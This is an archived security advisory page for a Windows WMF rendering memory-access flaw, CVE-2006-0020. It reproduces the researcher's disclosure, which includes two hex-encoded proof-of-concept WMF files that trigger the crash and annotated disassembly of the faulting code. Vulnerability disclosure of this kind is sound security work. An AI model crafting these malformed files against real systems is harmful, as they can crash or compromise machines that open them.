SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Windows Kernel Vendors:   Microsoft
Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015453
SecurityTracker URL:  http://securitytracker.com/id/1015453
CVE Reference:   CVE-2006-0020   (Links to External Site)
Updated:  Feb 8 2006
Original Entry Date:  Jan 9 2006
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  
Version(s): Denial of service on 98, 2000 SP4, XP SP2, 2003 SP1; and prior service packs; Remote code execution via IE 5.01 and IE 5.5 (see Description section)
Description:   A vulnerability was reported in Microsoft Windows in the Graphics Rendering Engine. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted Windows Meta File (WMF) formatted file that, when loaded by the target user, will trigger a memory error and cause the target application to crash or potentially execute arbitrary code.

A specially crafted ExtCreateRegion() or ExtEscape() function call can trigger this vulnerability.

Microsoft originally indicated that the reported application crashes are "Windows performance issues" that were previously identified by Microsoft and may be in the next service pack for the affected products. However, on February 7, 2005 [February 8, 2005, 0200 UTC], Microsoft issued an advisory indicating that arbitrary code execution may be possible, if exploited via IE 5.01 SP4 on Windows 2000 SP4 or IE 5.5 SP 2 on Windows Me.

cocoruder reported this vulnerability.

Impact:   A remote user can cause denial of service conditions on the target system.

A remote user may be able to cause arbitrary code to be executed on the target system.

Solution:   No solution was available at the time of this entry.

Microsoft recommends upgrading to Internet Explorer 6 SP1 (which is not affected) if you are using Windows 2000 SP4 or Windows Millennium Edition.

The vendor's advisory is available at:

http://www.microsoft.com/technet/security/advisory/913333.mspx

Vendor URL:  www.microsoft.com/technet/security/advisory/913333.mspx (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Feb 14 2006 (Vendor Issues Fix) Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code
The vendor has issued a fix.



 Source Message Contents

Subject:  [UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory

Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities

//this bug report is update for <<Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities>> by cocoruder 2006.01.07

by cocoruder
page:http://ruder.cdut.net
email:frankruder_at_hotmail.com

Last Update:2006.01.09
class:design error
Remote:yes
local:yes

Product Affected:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4

Vendor:
www.microsoft.com

Overview:
Microsoft Windows GRE(Graphics Rendering Engine) has been discovered multiple Unauthorized Memory Access vulnerabilities while rendering
 WMF format file.Users who view the malicious WMF format file will bring a denial of service attack(explorer.exe will be restart).attend
 that the follow two vuls are independent of MS05-053 or MS06-001.

Details:
there is 2 vulnerabilities at least.

1.ExtCreateRegion call result in Unauthorized Memory Access vulnerability

you can exploit the vul via create a WMF file like this:
010009000003220000000100844300000000		//WMFHEAD
050000000B028B033F21					//first WMFRECORD
04000000FF0044444444444444444444FFFF33333333333333333333FFFF41424344		//the vul WMFRECORD
030000000000						//end WMFRECORD

the issue code as following:
.text:7F00FE07 loc_7F00FE07:                           ; CODE XREF: PlayMetaFileRecord+1256j
.text:7F00FE07                 sub     eax, 3
.text:7F00FE0A                 jnz     loc_7F022B9A    ; 0xff
.text:7F00FE10                 movzx   ecx, word ptr [ebx+10h]	;get total "PointtStruct" number
.text:7F00FE14                 mov     [ebp-88h], ecx		;save
.text:7F00FE1A                 test    ecx, ecx
.text:7F00FE1C                 jnz     short loc_7F00FE2E	;jmp 
.text:7F00FE1E                 xor     eax, eax
.text:7F00FE20                 push    eax             ; int
.text:7F00FE21                 push    eax             ; int
.text:7F00FE22                 push    eax             ; int
.text:7F00FE23                 push    eax             ; int
.text:7F00FE24                 call    CreateRectRgn
.text:7F00FE29                 jmp     loc_7F010494
.text:7F00FE2E ; &#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#2173
8;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;?
.text:7F00FE2E
.text:7F00FE2E loc_7F00FE2E:                           ; CODE XREF: PlayMetaFileRecord+C15j
.text:7F00FE2E                 xor     edi, edi
.text:7F00FE30                 mov     [ebp-8Ch], edi
.text:7F00FE36                 lea     eax, [ebx+1Ch]		;get first "PointtStruct" address
.text:7F00FE39                 mov     [ebp-90h], eax		;save
.text:7F00FE3F                 and     [ebp-94h], edi			
.text:7F00FE45                 and     [ebp-98h], edi
.text:7F00FE4B                 test    ecx, ecx
.text:7F00FE4D                 jbe     short loc_7F00FE8C		
.text:7F00FE4F
.text:7F00FE4F loc_7F00FE4F:                           ; CODE XREF: PlayMetaFileRecord+C83j
.text:7F00FE4F                 movzx   ecx, word ptr [eax]	;get PointNum,here will trigger memory access error**
.text:7F00FE52                 mov     edx, ecx				
.text:7F00FE54                 shr     edx, 1			;PointNum/2
.text:7F00FE56                 add     edx, edi			;sum PointNum/2
.text:7F00FE58                 cmp     edx, edi
.text:7F00FE5A                 jb      loc_7F0106D5
.text:7F00FE60                 mov     edi, edx
.text:7F00FE62                 mov     [ebp-8Ch], edi
.text:7F00FE68                 cmp     ecx, 7FFFFFFBh
.text:7F00FE6E                 jnb     loc_7F0106D5
.text:7F00FE74                 lea     eax, [eax+ecx*2+8]
.text:7F00FE78                 inc     dword ptr [ebp-98h]	;counter+1
.text:7F00FE7E                 mov     ecx, [ebp-98h]
.text:7F00FE84                 cmp     ecx, [ebp-88h]		;cmp total "PointtStruct" number
.text:7F00FE8A                 jb      short loc_7F00FE4F	;traverse all "PointtStruct"
.text:7F00FE8C
.text:7F00FE8C loc_7F00FE8C:                           		; CODE XREF: PlayMetaFileRecord+C46j
.text:7F00FE8C                                         		; PlayMetaFileRecord+14D8j
.text:7F00FE8C                 cmp     dword ptr [ebp-94h], 0
.text:7F00FE93                 jnz     loc_7F022BA2
.text:7F00FE99                 cmp     edi, 0FFFFFFDh
.text:7F00FE9F                 jnb     loc_7F022BA2
.text:7F00FEA5                 mov     eax, [ebp-8Ch]
.text:7F00FEAB                 add     eax, 2
.text:7F00FEAE                 shl     eax, 4
.text:7F00FEB1                 mov     [ebp-9Ch], eax
.text:7F00FEB7                 push    eax             ; uBytes
.text:7F00FEB8                 push    0               ; uFlags
.text:7F00FEBA                 call    ds:LocalAlloc		;will allocate memory normally.
.text:7F00FEC0                 mov     edi, eax


2.ExtEscape POSTSCRIPT_INJECTION result in Unauthorized Memory Access vulnerability

you can exploit the vul via create WMF file like this:
010009000003220000000100844300000000	//WMFHEAD
050000000B028B033F21				//first WMFRECORD
0400000026001610FFFF444444444444444444444444444444444444444444444344	//the vul WMFRECORD
030000000000					//end WMFRECORD

the issue code as following:

.text:7F027312 loc_7F027312:                           ; CODE XREF: ExtEscape+11Ej
.text:7F027312                                         ; ExtEscape+12Aj
.text:7F027312                 test    byte ptr [ecx+4], 40h
.text:7F027316                 jnz     loc_7F017CEC
.text:7F02731C                 mov     ebx, [ebp+arg_8]		;we can cotrol this:cbSize
.text:7F02731F                 add     ebx, 1Ah			;cbSize+0x1a
.text:7F027322                 and     ebx, 0FFFFFFFCh		;cbSize+0x1a-4
.text:7F027325                 mov     eax, large fs:18h
.text:7F02732B                 mov     eax, [eax+30h]
.text:7F02732E                 push    ebx
.text:7F02732F                 push    0
.text:7F027331                 push    dword ptr [eax+18h]
.text:7F027334                 call    ds:RtlAllocateHeap	;allocate memory size=cbSize+0x16
.text:7F02733A                 test    eax, eax
.text:7F02733C                 jz      short loc_7F027385
.text:7F02733E                 mov     ecx, [ebp+arg_4]
.text:7F027341                 mov     [eax+0Ch], ecx
.text:7F027344                 mov     ecx, [ebp+arg_8]
.text:7F027347                 mov     [eax+10h], ecx
.text:7F02734A                 mov     edx, ecx
.text:7F02734C                 shr     ecx, 2
.text:7F02734F                 sub     ebx, 8
.text:7F027352                 mov     [eax+8], ebx
.text:7F027355                 lea     edi, [eax+14h]
.text:7F027358                 rep movsd			;copy,here will trigger a memory error likely**
.text:7F02735A                 mov     ecx, edx
.text:7F02735C                 and     ecx, 3
.text:7F02735F                 rep movsb
.text:7F027361                 mov     ecx, [ebp-4]
.text:7F027364                 mov     edi, [ebp+arg_14]
.text:7F027367                 lea     edx, [ecx+48h]
.text:7F02736A                 mov     esi, [edx+4]
.text:7F02736D                 mov     [eax+4], esi


Solution:
Microsoft has not develop the patch,please unregister the Windows Picture and Fax Viewer (Shimgvw.dll)(see MS06-001).

Thanks:
thanks all my friends.

-EOF-

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC